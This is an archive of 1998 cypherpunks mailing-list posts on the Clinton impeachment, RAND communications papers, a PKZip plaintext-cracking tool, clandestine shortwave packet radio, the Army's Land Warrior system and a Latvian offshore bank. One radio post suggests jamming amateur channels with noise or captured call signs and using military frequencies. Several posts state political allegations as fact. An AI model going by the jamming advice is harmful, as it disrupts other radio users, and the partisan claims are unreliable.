redundant paths selected on an instant-by-instant basis. The communications
links for such a system can be built in a different manner than their
equivalents in today's systems, taking advantage of the system's less rigid
distortion level and tandem reliability requirements. The fundamental
objective for the system's links is that they permit formation of new
routes cheaply (a necessary survivability criterion), yet allow
transmission on the order of millions of bits per second (see ODC-I,
-VII[1]); system reliability and a low raw error rate are secondary. And,
since future networks conveying military traffic must be designed with the
expectation of heavy damage, powerful digital error detection and error
removal methods have been built into the system.






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 12 Sep 1998 23:34:06 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: radio net (fwd)
In-Reply-To: <199809130029.TAA18636@einstein.ssz.com>
Message-ID: <3.0.5.32.19980912213251.007cd230@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



See also http://www.rand.org/publications/RM/RM3420/

In fact you may want to look at RAND's work On Distributed Communications
http://www.rand.org/publications/RM/RM3420/RM3420.list.html

Duck and cover your packets...









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Sep 1998 20:52:33 +0800
To: Declan McCullagh <jimg@mentat.com>
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809121549.IAA28683@zendia.mentat.com>
Message-ID: <199809130146.VAA08964@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:54 AM 9/12/98 -0700, Declan McCullagh wrote:
>1. it's tough to argue that clinton's apparent perjury in Jones was
>immaterial
>
>2. i know of no law saying perjury only a crime if it's "material"
>
>3. perjury is certainly one of the "great offenses" that common law says
>is impeachable.
>
>4. besides, non-criminal activities can constitute impeachable offenses --
>look at second and third articles of impeachment in Nixon's case
>
>-Declan

In addition, the last man impeached and convicted by Congress (circa 1988)
Judge Alcy Hastings (sp?) was convicted for perjury in a tax evasion case
in which he was acquitted of the original charges.  Hastings was later
elected to Congress from Florida and last week dissed Clinton by not
attending a fundraiser he held there for the Democrat candidate for
governor.  Hastings said that he has yet to make up his mind on Clinton and
wants to review the evidence.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 12 Sep 1998 16:53:42 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <adc549570157e4fc89fa4345ee0a6ffb@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 12 Sep 1998, David Honig wrote:

> There is no evidence that Clinton actually *inhaled* on the
> flavored cigar...

Something here is a little fishy...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sun, 13 Sep 1998 00:25:12 +0800
To: cypherpunks@toad.com
Subject: voice from the past
Message-ID: <3.0.5.32.19980912221213.007c9870@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Secrecy of Secrecy
	
Without the freedom to expose the system proposal to widespread scrutiny'
by clever minds of diverse interests, is to increase the risk that
significant points of potential weakness have been overlooked. A frank and
open discussion here is to our advantage.

http://www.rand.org/publications/RM/RM3765/RM3765.chapter2.html

Chapter 3 has an excellent picture of a binary key on a hollerith card...
http://www.rand.org/publications/RM/RM3765/RM3765.chapter3.html






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sun, 13 Sep 1998 00:25:17 +0800
To: cypherpunks@toad.com
Subject: canadian cryptanalysis, eh?
Message-ID: <3.0.5.32.19980912221243.007cf100@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain




http://watserv1.uwaterloo.ca/~brobinso/cryptan.html
also 
http://watserv1.uwaterloo.ca/~brobinso/rqmts.html

Suggested courses

CA-105 - Introduction to Cryptography and Exploitation of Manual
Cryptosystems CA-107 - Exploitation of Manual Cryptosystems CA-123 -
Shift-Register Cryptology CA-223 - Advanced Shift-Register Cryptology
CA-247 - Vocoders for Cryptanalysts MA-213 - PTAH MA-246 -
Cryptomathematics for Mathematicians MA-256 - Signal Processing
Mathematics[24] 


Knowledge of the following areas of Mathematics is required:



Probability and Statistics including Stochastic and Markov Processes,
Linear Algebra and Abstract Algebra including Finite Field Theory, Shift
Register and Polynomial Theory, Communications, Information and Coding
Theory, Sampling Theory, Digital Filtering, Numerical Methods, and Fast
Transformation Algorithms. 






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 12 Sep 1998 22:10:16 +0800
To: Tim May <cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <3.0.5.32.19980912140527.007d2ad0@m7.sprynet.com>
Message-ID: <199809130309.XAA14731@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:18 PM 9/12/98 -0700, Tim May wrote:
>
>I've seen several Cypherpunks express the opinion that can be summarized as
>"We paid $40 million for _this_?" And "Ken Starr is on a witch hunt."

Ken Starr is investigating 5 separate Clinton criminal conspiracies.  Walsh
took 7 years and $60megs to investigate Iran/Contra (two criminal
conspiracies).

I like it when the rulers are consumed by their own creations.

DCF

Extra credit awarded for naming Starr's 5 investigations.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John McCormac <jmcc@hackwatch.com>
Date: Sat, 12 Sep 1998 18:05:11 +0800
To: "Brian W. Buchanan" <cypherpunks@cyberpass.net
Subject: Re: Investigating the Suspect Computer
In-Reply-To: <Pine.BSF.4.02A.9809121417000.254-100000@smarter.than.nu>
Message-ID: <35FAFEA3.D737AC1B@hackwatch.com>
MIME-Version: 1.0
Content-Type: text/plain



Brian W. Buchanan wrote:
> 
> > THIS PACKAGE IS DISTRIBUTED TO LAW ENFORCEMENT AND
> > PRIVATE INVESTIGATORS ONLY!!  THE ARCHIVE FILE IS [PKZip]
> > ENCRYPTED, AND YOU WILL NEED A PASSWORD TO EXTRACT
> > THE ARCHIVE.  IF YOU ARE NOT WORKING IN LAW ENFORCEMENT,
 
> According to one of the READMEs that comes with a public domain
> implementation of the PKZIP crypto algorithm, there is a 

A few years ago the plaintext attack was implmented. One of the first
tests was on an encrypted file released in Europe that was supposed to
contain the source code and emulation of the Sky 0A smartcard. It
cracked it in about 3 hours I seem to recall.

The implementation worked exceedingly well and ran on Linux. The page
says that the w95 version is also available. 

http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html

Regards...jmcc
-- 
********************************************
John McCormac            * Hack Watch News
jmcc@hackwatch.com       * 22 Viewmount, 
Voice:   +353-51-873640  * Waterford,
BBS&Fax: +353-51-850143  * Ireland
http://www.hackwatch.com/~kooltek
********************************************

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+
ZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz
TRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX
tCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3
YXRjaC5jb20=
=sTfy
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 13 Sep 1998 07:15:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net
In-Reply-To: <199809130024.UAA12462@mx02.together.net>
Message-ID: <v0401170db2215f84fec1@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:24 PM -0400 on 9/12/98, Brian B. Riley wrote:



>  Bob, I am afraid you are showing your ignorance here.

I don't think so.

> SSB is just one of
> the many modes of emission standardized in radio communications, its used
> by the amateur radio service (ham) , the citizens radio service (cb), the
> military, etc ...

I know what Single Sideband means. As I've said before, and what you failed
to read later on in this thread, evidently, is that there are commercial
Single Sideband radios out there which have the range of ham sets. These
radios are used for commercial ship-to-shore traffic, and I expect that
encryption is legal on them. I expect that, because these frequencies are
subject to international convention rather than federal law, they have more
leeway (heh... nautical pun) on their use. Including, I bet, digital
packets and encryption.


>  The real problem is that to build any sort of network would require some
> fixed positions, which, if it were intended to be 'clandestine' would be
> compromised sooner or later ... either that or several poor shnooks would
> have full time jobs driving vans around and around to keep the RDF snoops
> guessing ...

My understanding is that Ryan's looking for some kind of post-infocalyptic
radio network for when it All Falls Down Sometime Soon (tm). I expect that
in that event, Ham would be fine, because there is no, as Mr. Gore likes to
say, controlling legal authority, to worry about. But, to put up and test a
network, commercial SSB would do just fine. And, of course, After The Big
One, what kind of long-distance shortwave radio you run it on will be
superfluous, ham, SSB or no.

>  In general there would be a better chance of pulling it off if you
> stayed away from the ham radio bands. 'self-policing' is not a character
> of another bands except the commercial broadcast bands.

Right, so (he says for the third time), why not just order a commerial
ship-to-shore SSB rig, something which costs within an order of magnitude,
plus or minus, of a Ham set, and go play?


>  Spread spectrum would have more promise as many stations could be on the
> air at once on the same frequency thus making life quite confusing for
> the T-hunters.

Right. If we had some, um, ham, we could have some ham and eggs. If we had
some eggs.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Sun, 13 Sep 1998 08:02:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net
Message-ID: <35FBC34E.6B4F9127@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



SSB xceivers cost <$700. Try any marine electronics store.  Best choice
is a ham xceiver with strap selectable SSB (actually a violation of FCC
dictate to enable SSB on a ham rig, but everyone does it anyway). This
would cost ~$1500, the Icom 7658 is a good one I know of. Go and get
your local equivalent of a VHF license, send in the extension to cover
SSB (~$50).   Then purchase a 'PacRat' from any ham hangout. I got mine
in Redwood City CA, on El Camino real - some years back now though.
This is a little box that hooks into the back of the ham/SSB set and
into a serial port of your PC.  It comes with some basic packet handling
software.  Last time I looked, PacRats were <$200.  Don't expect any
great xfr rates however.  Noise to signal requires many packet
retransmissions as the ionosphere is not a very good mirror.  Running
TCP/IP over it should be easily doable.  Basic use is to dial in the
frequency yourself on the SSB (this usually requires an auto-tuner ~$700
AND a manual tuner ~$100, for best results).  You need to get the best
antenna you can afford.  Unfortunately, antennas are frequency range
specific, so you'll probably need 3: one for 0-5000 miles, 5000-12000,
12000-?.  Its easy to rig the tuner to support 2-3 antennas, switch
selectable.  You need a Good Earth for anything to happen as expected.
By now it should be possible to get some extra SW to drive the freq
selection, so you could do spread spectrum.  This is not allowed of
course, as you are expected to do the call-sign exchange protocol on
each freq session.  There are freqs that are dedicated to digital
(ship-to-shore commercial).  You may have to get a commercial license
for this though.  One nasty thing about radio is that you share the
spectrum with others, so collisions tend to make a hash out of
reliability.  Store and forward at unpopular times such as 3:00 EST,
could be a good alternative.  The longer distance freqs (>12000), are
the most uncluttered, but suffer from the most noise to signal.  A
bounce across the pacific to the house next door, would be potentially
more reliable than a lower freq. Most of the ham sets also support FM,
so it would also be possible to piggyback on the ricochet freqs for line
of sight use. Or for a real adrenaline rush, piggyback the mil freqs.

If you really want to give the hams fits,  write a noise to morse engine
(or better yet, some captured call signs repeated endlessly) and swamp
the channels, where the old popular mechanics guys discuss their antenna
envy, at random intervals. 9:00 in the Ozarks is a fine time.  Sit back
and wait for the black vans to drive up.

"Educate, don't Agitate"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 13 Sep 1998 08:13:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies
Message-ID: <199809131313.JAA12863@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



If nothing else, Clinton deserves his troubles because he is a very strong
supporter of the legal structures that caused them.

1)  He is a lawyer and a strong supporter of the trial lawyers who have
promoted extremely expansive civil discovery of the sort that allowed
Clinton to be questioned about Monica in the Jones case.

2)  He is a strong advocate of the sort of sexual harassment law that led
to the Jones case.  He thinks it should be punished harshly.  A real feminist.

3)  He is a strong advocate of the Ethics in Government Act and pushed its
renewal through Congress in 1994 when the Act was going to expire and when
the Dems controlled both houses of Congress.

4)  He is a law-and-order liberal who believes in executing retarded
murderers and jailing hospital execs who submit Medicare bills based on
misunderstandings of detailed and contradictory regulations.

5)  His wife (and presumably he) was a strong supporter of an expansive
definition of "high crimes and misdemeanors" during Watergate.

"Hoist on your own petard" (and I even know what a petard is).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 13 Sep 1998 08:51:47 +0800
To: Tim May <cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <199809130309.XAA14731@mail1.panix.com>
Message-ID: <199809131351.JAA14866@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:41 PM 9/12/98 -0700, Tim May wrote:
>>Extra credit awarded for naming Starr's 5 investigations.
>
>Let's see:
>
>-- Whitewater and Madison Guarantee (may be 2 separate investigations)
>
>-- Filegate (White House had 1100 FBI files, overseen by Craig the Bar
Bouncer)
>
>-- Travelgate (replacing the old staff is kosher, but accusing them of
>crimes is not)
>
>-- Cigargate
>

1) Whitewater

2) Vince Foster

3) Travelgate

4) Filegate

5) Fornigate

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 13 Sep 1998 09:53:38 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <199809131351.JAA14866@mail1.panix.com>
Message-ID: <199809131451.KAA19264@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199809131351.JAA14866@mail1.panix.com>, on 09/13/98 
   at 09:53 AM, Duncan Frissell <frissell@panix.com> said:

>At 08:41 PM 9/12/98 -0700, Tim May wrote:
>>>Extra credit awarded for naming Starr's 5 investigations.
>>
>>Let's see:
>>
>>-- Whitewater and Madison Guarantee (may be 2 separate investigations)
>>
>>-- Filegate (White House had 1100 FBI files, overseen by Craig the Bar
>Bouncer)
>>
>>-- Travelgate (replacing the old staff is kosher, but accusing them of
>>crimes is not)
>>
>>-- Cigargate
>>

>1) Whitewater

>2) Vince Foster

>3) Travelgate

>4) Filegate

>5) Fornigate

Unfortunately, there is still Chinagate that Reno is still stonewalling
the investigations on.

What ever happened with Cattlegate ($100,000 bribe payed to Hillary)?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows: an Unrecoverable Acquisition Error!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNfvd/Y9Co1n+aLhhAQGJogQAykoBWz4jqHhFpvp4LGapjp5lyHtuxdEv
wZUyZzGUfu5rlhPem1TofJ4fGii+v4KpisnOCyB7MlwpSHkYYQf/gXio9Dwie9RF
hm+esP7c9HatDZFosoNU5Mq6VEyYJyNx8aZDR2SPiVeE5dCqV1QmGNejcNaNOELo
ogoLYXXKNtE=
=Ie5X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 13 Sep 1998 10:07:13 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <199809131351.JAA14866@mail1.panix.com>
Message-ID: <199809131506.LAA19297@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:57 AM 9/13/98 -0500, William H. Geiger III wrote:

>What ever happened with Cattlegate ($100,000 bribe payed to Hillary)?

Statute of Lim had long passed.  Also, I'm not sure if an unemployed
hausfrau living in public housing in the District of Columbia is a "covered
person" under the Ethics in Government Act.

Ken *can* prosecute her for crimes uncovered in the course of his
investigation and she has no special privileges (other than spousal).

Chelsea too (Misprison of a Felony, probably).

Socks and Buddy are immune since animal prosecutions ended with the Middle
Ages.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Sat, 12 Sep 1998 23:28:11 +0800
To: cypherpunks@Algebra.COM
Subject: Monica, slavegirl of Gor (fwd)
Message-ID: <Pine.LNX.3.96.980913122452.30403A-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



This was found on a different mailing lists.  names have been removed to
protect the guilty.

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.

---------- Forwarded message ----------
Subject: Re: Monica, slavegirl of Gor

The best opinion I've heard so far on this topic: "If the government's going to
spend $50 million on pornography, I'd rather it be by artists I support."

Carol




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Sat, 12 Sep 1998 23:38:31 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <v03130300b220d70c14e9@[209.66.100.110]>
Message-ID: <Pine.LNX.3.96.980913123025.30403B-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 12 Sep 1998, Tim May wrote:

> I've seen several Cypherpunks express the opinion that can be summarized as
> "We paid $40 million for _this_?" And "Ken Starr is on a witch hunt."
> 
> Indeed, a lot of money spend by the Independent Prosecutor. And Starr is
> indeed a Grand Inquisitor.

"Our weapons are Fear, Surprise, and our fanatical devotion to the
Demipublican party." 

> But he is following the law, and Attorney General Janet Reno authorized his
> latest venture.
> 
> I'm generally pleased with what's happening. Many points to make:

[snip]

Another that I think is relivant:

* He has been very anti-encryption for the American public, but is very
willing to use it to protect his own ass.  The hypocrasy of the situation
is glaring.

> Ironically, this situation is now so well known that such a statement would
> almost certainly be taken by a judge today as contempt of court. And yet we
> put up with having this lying sack of shit in the White House.
> 
> I am chortling.

"Now is the time on Sprockets when we dance!"

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 13 Sep 1998 15:19:54 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <v03130300b220d70c14e9@[209.66.100.110]>
Message-ID: <Pine.GSO.3.95.980913130607.4039E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 12 Sep 1998, Tim May wrote:

> * What goes around, comes around. The Liberal puke Democrats who crucified
> Bob Packwood, Clarence Thomas, and any number of corporate people charged
> with "sexual harassment," are now reaping what they sowed. "If she says it
> happened, it happened," the mantra of the feminazi left, is now apparently
> forgotten by Patricia It's not our business" Ireland.

There's also the idea popular in some gender feminist circles that the
imbalance of power in manager-employee relationships makes it impossible
for genuine consent to be given. Can there be any greater power imbalance
than the president of the United States and an intern? Where are the
feminist cries of outrage?

> * Lawmaking is paralzyed, frozen, stillborne. This I count as a Good Thing.
> Even better will be another 8-10 months of this nightly spectacle. No
> Health Care Reform, no Communications Decency Act II, no Tobacco Act,
> nothing.

In general you might be right. But for "noncontroversial" measures like
CDA II, well, it'll be in one of the appropriations bills that will be
approved in the next three weeks.

> * This disgraces the Presidency, which I also count as a Good Thing. There
> were hopes that Nixon's downfall would be the end of the Imperial
> Presidency, but, alas, the pomp and circumstance continued unabated. It's

The balance of power in the U.S. government is too tilted in favor of the
executive and federal agencies; I think more should be returned to
Congress and the states but don't think we're going to see that happen. To
do that Congress needs to be willing to seize it; they're not. If we get
Al Gore in the Oval Office we'll have business as usual.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 13 Sep 1998 13:19:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net
Message-ID: <v04011717b221b82cd6c0@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


MIME-Version: 1.0
Date: Sun, 13 Sep 1998 09:11:29 -0700
To: Robert Hettinga <rah@shipwright.com>
From: Somebody
Subject: Re: radio net

>
>I know what Single Sideband means. As I've said before, and what you failed
>to read later on in this thread, evidently, is that there are commercial
>Single Sideband radios out there which have the range of ham sets. These
>radios are used for commercial ship-to-shore traffic, and I expect that
>encryption is legal on them. I expect that, because these frequencies are
>subject to international convention rather than federal law, they have more
>leeway (heh... nautical pun) on their use. Including, I bet, digital
>packets and encryption.
>
>

If I remember correctly, this is escrowed encryption using code
books deposited with the appropriate authorities.

<Somebody's .sig>

--- end forwarded text


*That* sucks... I wonder who the "appropriate authorities" are?

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 13 Sep 1998 13:18:35 +0800
To: cypherpunks@cyberpass.net
Subject: The Empire Strikes Back (was IP: Army Tests Land Warrior for 21stCentury Soldiers)
Message-ID: <v04011719b221ba435485@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sun, 13 Sep 1998 09:33:31 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Army Tests Land Warrior for 21st Century Soldiers
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Department of Defense
http://www.defenselink.mil/news/Sep1998/n09111998_9809117.html

-------
NOTE: Website includes three photographs of device in use. No mention of
whether the computerized software in the device, of the GPS link and its
satellites are Y2K compliant.
-------

Army Tests Land Warrior for 21st Century Soldiers

 By Jim Garamone
 American Forces Press Service

FORT BELVOIR, Va. -- American soldiers and Marines are already among the
most deadly in the world, but a system called Land  Warrior will soon make
them unmatched.

 Land Warrior integrates small arms with high-tech equipment enabling
ground forces to deploy, fight and win on the battlefields of the 21st
century.

 "Land Warrior soldiers fight as a system, and the most important part of
the system is what's between his ears," said Army Lt. Col. Robert Serino,
Land Warrior product manager.

 Land Warrior came about in 1991 when an Army study group recommended the
service look at the soldier as a complete weapon system. The first priority
in Land Warrior is lethality. The second is survivability and the third,
command and control. The program will cost $2 billion when 45,000 sets of
the equipment are fielded between 2001-2014. The Marine Corps, Air Force
and many foreign countries are interested in the system.

 "First and foremost, Land Warrior is a fighting system," Serino said. Land
Warrior has several subsystems: the weapon, integrated helmet assembly,
protective clothing and individual equipment, computer/radio, and software.

 The weapon subsystem is built around the M-16/M-4 modular carbine. It has
a laser range finder/digital compass, a daylight video camera, a laser
aiming light and a thermal sight.

 "This system will allow infantrymen to operate in all types of weather and
at night," Serino said. In conjunction with other components, a soldier can
even shoot around corners without exposing himself to enemy fire.

 The integrated helmet assembly is lighter and more comfortable than
today's helmet, Serino said. It has a helmet-mounted monocular day display,
a night sensor with flat panel display, a laser detection module,
ballistic/laser eye protection, a microphone and a headset.

 The protective clothing and individual equipment subsystem incorporates
modular body armor and upgrade plates that can stop small-arms rounds fired
point-blank. It includes an integrated load-bearing frame,
chemical/biological protective garments and modular rucksack.

 The infantryman will attach the computer/radio subsystem to his
load-bearing frame. Over this goes the rucksack for personal gear. The
computer processor is fused with radios and a Global Positioning System
locator. A hand grip wired to the pack and attached to the soldier's chest
acts as a computer mouse and also allows the wearer to change screens, key
on the radio, change frequencies and send digital information.

 The subsystem comes in two flavors: The leader version has two radios and
a flat panel display/keyboard, and soldiers have one radio. With the
equipment, leaders and soldiers can exchange information. Soldiers using
their weapon-mounted camera, for example, can send videos to their leaders.

 Finally, the software subsystem includes tactical and mission support
modules, maps and tactical overlays, and the ability to capture and display
video images. The system also contains a power management module. Designers
set up the system so it can be updated as technology improves.

 The soldiers who will actually use Land Warrior have been consulted every
step of the way. Prime contractor Raytheon worked with experts at the U.S.
Army Infantry Center at Fort Benning, Ga., in designing the system. They
have taken the system to the users to ensure the system is headed in the
right direction.

 For instance, Serino said, "The rucksack has quick-release straps so an
infantryman can just drop it if the need arises. This is what our soldiers
asked for -- which is really great."

 One problem the Army must overcome before fielding is power. Current
batteries last about 150 minutes with all systems running. "Clearly
soldiers won't have all systems running all the time, but this is still not
acceptable," said Serino. Other batteries under development by the Army's
Communications-Electronics Command may push the time up to 30 hours.

 The Army plans to test the Land Warrior system with a platoon from the
82nd Airborne Division, Fort Campbell, Ky. Later, a battalion-sized test is
planned, Serino said.

 "Ultimately, soldiers will define the end state of Land Warrior -- and
we'll know more every time the soldiers employ the system," he said. "We'll
get the system up to a certain point, then the soldiers will be the people
who say how far it can really go."
 -----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sun, 13 Sep 1998 16:27:39 +0800
To: Soren <cypherpunks@cyberpass.net
Subject: Re: radio net
In-Reply-To: <35FBC34E.6B4F9127@workmail.com>
Message-ID: <3.0.5.32.19980913142530.007d1bc0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:06 AM 9/13/98 -0400, Soren wrote:
>If you really want to give the hams fits,  write a noise to morse engine
>(or better yet, some captured call signs repeated endlessly) and swamp
>the channels, where the old popular mechanics guys discuss their antenna
>envy, at random intervals. 9:00 in the Ozarks is a fine time.  Sit back
>and wait for the black vans to drive up.

Performance art: solar-powered low-power, low-freq modulators 
(Hams get off designing this stuff) with
digitized true noise inputs, scattered about the desert.    Maybe scattered in
a big smiley face pattern. Extra points for burst transmissions.

Too subtle for SRL but amusing nonetheless....










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@earth.wazoo.com>
Date: Sun, 13 Sep 1998 10:05:57 +0800
To: cypherpunks@Algebra.COM
Subject: No Subject
In-Reply-To: <v0401170db2215f84fec1@[139.167.130.247]>
Message-ID: <199809131506.PAA02152@earth.wazoo.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>>> "Bobby" == Robert Hettinga <rah@shipwright.com> writes:

  > My understanding is that Ryan's looking for some kind of
  > post-infocalyptic radio network for when it All Falls Down
  > Sometime Soon (tm). I expect that in that event, Ham would be
  > fine, because there is no, as Mr. Gore likes to say, controlling
  > legal authority, to worry about.

Worse, there may be any number of "controlling legal authorities".

You don't suppose that all the existing radio monitoring equipment is
going to stop working just because the infrastructure for managing it
is in disarray?

Or that people with access to that equipment are going to have any
problem getting fuel for their helicopters from government fuel dumps?

But your communication network is going to become a valuable resource,
and more than one tin-pot wannabe is going to want to get his hands on
it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 13 Sep 1998 18:37:47 +0800
To: cypherpunks@Algebra.COM
Subject: Offshore Banking In Latvia
In-Reply-To: <199809132148.XAA29865@replay.com>
Message-ID: <199809132336.QAA12214@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 11:48 PM 9/13/98 +0200, Anonymous wrote:
> Found this: http://offshorehaven.nu/banking/index.html no
> idea whether a trap or a jewel.

Looks a whole lot more promising than the EUB (which turned
out to be a classic take the money and run operation)

The web site is not in the US, which shows that they are
serious.  Latvia is a pro capitalist, anti communist
government.  (I regard the US government as anti capitalist
and soft on communism),  The government sees itself as
presiding over an economy that is still basically socialist,
even though they have transformed far more rapidly and
radically than most of the former Soviet Union, in
particularly they have transformed far more radically than
Russia.

On the other hand, many of the facts that one would need to
know in order to know how safe your money is are simply not
made available.  In particular the web site does not mention
the banks name. 

Oh wow.  That does not inspire confidence.

They write:
       Q. What is the name of the Bank? 
       A. This is the typical question asked by "wannabes"
            and competitors.   Our firm does not disclose the
            name of the Bank until confirmation of the
            payment of our fees is received. The Bank only
